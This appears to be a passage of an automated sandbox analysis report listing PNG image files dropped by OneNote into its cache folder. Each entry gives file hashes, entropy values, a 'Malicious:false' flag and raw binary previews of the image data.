                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000023.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000024.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000025.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000026.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000027.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000028.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000029.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002A.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002B.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002C.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002D.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002E.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
